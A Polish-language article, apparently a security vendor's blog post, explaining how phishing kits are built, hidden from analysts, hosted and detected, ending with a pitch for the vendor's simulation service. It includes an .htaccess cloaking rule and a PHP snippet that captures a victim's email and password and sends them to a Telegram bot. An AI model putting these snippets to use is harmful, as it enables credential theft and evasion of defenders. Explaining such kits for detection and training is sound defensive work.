Anatomia nowoczesnego zestawu phishingowego
„Zestaw phishingowy” to spakowany, wielokrotnego użytku kod, który napastnicy wdrażają, aby sklonować stronę logowania, zebrać dane uwierzytelniające i je wyprowadzić. Zrozumienie, jak takie zestawy są zbudowane — i jak się ukrywają — znacznie ułatwia wczesne wykrywanie kampanii i budowanie przekonujących symulacji obronnych.
Co zawiera zestaw
Typowy zestaw to archiwum ZIP wrzucone na przejęty serwer albo tani hosting. Jego struktura jest zaskakująco stała:
kit/
├── index.php # sklonowana strona docelowa
├── login.php # obsługa formularza: przechwytuje + przekazuje dane logowania
├── assets/ # wierne kopie CSS, JS, logo, czcionek
├── config.php # cel wyprowadzenia danych (e-mail, bot Telegram, zdalny URL)
├── antibots.php # listy blokad dla crawlerów, sandboxów, badaczy
└── .htaccess # przepisania, filtr geo/IP, ochrona przed hotlinkiem
Nowoczesne zestawy coraz częściej sprzedaje się „jako usługę” (PhaaS — Phishing-as-a-Service), wraz z panelami subskrypcyjnymi, aktualizacjami i wsparciem.
Klon
Strona docelowa to zwykle kopia bajt po bajcie prawdziwego ekranu logowania, zdjęta zgrywarką stron albo przeglądarką headless. Dwa znaki są częste:
- Bezwzględne adresy zasobów wciąż wskazujące legalny CDN (dzięki temu strona ładuje prawdziwe logo, a formularz wysyła do napastnika).
<form>, któregoactionkieruje do lokalnego skryptu PHP zamiast do prawdziwego punktu końcowego marki.
Zaawansowane zestawy w czasie rzeczywistym pośredniczą wobec prawdziwej strony (układ adversary-in-the-middle z narzędziami takimi jak Evilginx), przekazując to, co wpisuje ofiara, do autentycznego serwera i kradnąc powstały plik cookie sesji — co pokonuje większość MFA.
Warstwa antyanaliza
Składnik antibots utrzymuje zestaw przy życiu. Filtruje odwiedzających, zanim poda stronę phishingową:
- Filtrowanie po user-agent i ASN — blokuje znane crawlery i zakresy IP Google, Microsoftu, dostawców bezpieczeństwa i chmurowych sandboxów.
- Sprawdzenia referer i geo — podaje stronę tylko celom z oczekiwanego kraju, resztę przekierowując na prawdziwą witrynę.
- Ograniczanie tempa i linki jednorazowe — token w adresie URL wypala się po jednej wizycie, więc przekazana próbka pokazuje nieszkodliwy błąd 404.
# fragment .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
Dlatego adres URL, który analitykowi SOC „wygląda na martwy”, kilka minut wcześniej był w pełni żywy dla ofiary.
Przechwycenie i wyprowadzenie danych logowania
Skrypt sprawdza tylko tyle, by wyglądać wiarygodnie, po czym wysyła dane. Kanały wyprowadzania, mniej więcej według popularności:
- SMTP / mail() na zaszytą w kodzie skrzynkę.
- API botów Telegram — wywołanie
sendMessagena token bota, tanie i odporne. - POST na adres C2 albo webhook Discorda.
- Lokalny plik dziennika, który operator zbiera później.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Zwróć uwagę na końcowe przekierowanie: po „nieudanym logowaniu” ofiara trafia na prawdziwą stronę, zakłada literówkę, loguje się pomyślnie i niczego nie podejrzewa.
Hosting i dostarczanie
Zestawy wolą infrastrukturę jednorazową: przejęte witryny WordPress, otwarte przekierowania na zaufanych domenach, świeżo zarejestrowane łudząco podobne domeny oraz coraz częściej legalne usługi (Cloudflare Workers, IPFS, SharePoint, Google Docs), by pożyczyć ich reputację. Dostarczanie łączy zestaw z przynętą — fakturą, „ponowną weryfikacją” MFA, powiadomieniem o udostępnionym dokumencie.
Wykrywanie obronne
Sygnały warte tropienia:
- Świeżo zarejestrowane domeny podobne do Twojej marki (monitoruj logi CT i typosquaty).
- Haszowanie favikony i DOM — zestawy wykorzystują dokładnie te same zasoby sklonowanej marki.
- Wychodzące wywołania do Telegrama / webhooków z serwerów WWW, które nie mają powodu ich robić.
- Wysyłanie danych logowania do nieoczekiwanych origin w telemetrii przeglądarki.
- Raporty zbiorcze DMARC ujawniające próby podszywania się pod Twoją domenę.
Niewygodna prawda: dobrze zbudowany zestaw AiTM pokonuje MFA przez SMS i aplikację, kradnąc token sesji. Metody odporne na phishing — FIDO2 / passkey — to trwałe rozwiązanie.
Jak pomaga GottaPhish
Nowoczesne zestawy phishingowe robią broń z wiernych klonów i kradzieży sesji AiTM, które pokonują nawet MFA przez SMS i aplikację. GottaPhish i jego zespół ekspertów pomagają stawić czoła dokładnie temu zagrożeniu: bezpieczne, w pełni audytowane symulacje odwzorowujące prawdziwe zestawy — linki z tokenami, przepływy przechwytywania danych logowania, scenariusze AiTM — z pulpitami pokazującymi, które przynęty chwytają i gdzie MFA się broni. Nasi eksperci pomagają przy wdrożeniu, projektują scenariusze odtwarzające obecne rzemiosło PhaaS i pomagają interpretować wyniki jako ukierunkowane szkolenia oraz konkretne sygnały inżynierii wykrywania dla Twojego SOC.
